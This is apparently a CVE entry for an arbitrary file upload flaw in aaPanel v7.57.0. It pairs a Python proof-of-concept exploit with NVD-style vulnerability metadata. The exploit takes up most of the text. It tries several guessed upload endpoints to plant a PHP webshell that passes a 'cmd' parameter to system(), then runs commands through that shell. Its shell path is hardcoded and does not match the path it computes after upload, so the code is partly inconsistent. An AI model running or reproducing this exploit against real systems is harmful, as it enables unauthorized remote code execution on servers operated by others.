CVE-2026-29859

import requests import sys import random import string # CVE-2026-29859 PoC - aaPanel v7.57.0 Arbitrary File Upload # Target: aaPanel v7.57.0 # Vulnerability: Arbitrary file upload leading to RCE def generate_random_string(length=8): return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) def upload_webshell(target_url, webshell_code): """ Upload malicious file to target server """ filename = f"{generate_random_string()}.php" # Construct the file upload request files = { 'file': (filename, webshell_code, 'application/x-php') } # Try common aaPanel upload endpoints upload_endpoints = [ '/api/panel/upload', '/api/upload', '/files/upload', '/panel/upload' ] for endpoint in upload_endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.post(url, files=files, timeout=10) if response.status_code == 200: print(f"[+] Upload successful via {endpoint}") return url.replace(endpoint, response.json().get('path', '')) except Exception as e: print(f"[-] Failed to upload via {endpoint}: {e}") return None def execute_command(target_url, command): """ Execute system command via uploaded webshell """ webshell_url = target_url + "/uploads/shell.php" params = {'cmd': command} try: response = requests.get(webshell_url, params=params, timeout=10) return response.text except Exception as e: return f"Error: {e}" def main(): if len(sys.argv) < 2: print("Usage: python cve-2026-29859.py <target_url>") print("Example: python cve-2026-29859.py http://target.com:7800") sys.exit(1) target_url = sys.argv[1] # PHP webshell code webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" print("[*] CVE-2026-29859 - aaPanel v7.57.0 Arbitrary File Upload") print(f"[*] Target: {target_url}") # Step 1: Upload webshell print("\n[1] Uploading webshell...") uploaded_path = upload_webshell(target_url, webshell) if uploaded_path: print(f"[+] Webshell uploaded to: {uploaded_path}") # Step 2: Execute commands print("\n[2] Testing RCE...") result = execute_command(target_url, "whoami") print(f"[+] Command output: {result}") else: print("[-] Failed to upload webshell") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-29859", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:27.347", "lastModified": "2026-03-23T16:16:45.193", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file upload vulnerability in aaPanel v7.57.0 allows attackers to execute arbitrary code via uploading a crafted file."}, {"lang": "es", "value": "Una vulnerabilidad de carga arbitraria de archivos en aaPanel v7.57.0 permite a los atacantes ejecutar código arbitrario mediante la carga de un archivo manipulado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aapanel:aapanel:7.57.0:*:*:*:*:*:*:*", "matchCriteriaId": "BEA5AFC6-F733-4683-A374-C9665E0A2250"}]}]}], "references": [{"url": "https://github.com/aapanel/aapanel", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2026-29859", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}